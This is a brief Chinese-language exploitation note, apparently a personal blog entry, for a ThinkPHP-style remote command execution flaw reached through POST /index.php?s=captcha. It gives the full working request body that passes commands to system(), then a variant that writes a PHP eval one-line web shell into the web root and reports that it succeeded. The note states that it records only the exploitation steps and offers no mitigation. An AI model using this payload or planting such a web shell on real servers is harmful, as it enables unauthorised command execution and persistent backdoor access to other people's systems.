POST /index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
id替换成要执行的命令
例如_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
也可以写入木马,看到其他大佬的博客上通过echo和>创建文件
修改正文部分为_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php @eval($_POST['cmd']);?>" > /var/www/public/test.php
尝试写入一句话木马
成功写入
此篇只记录漏洞利用过程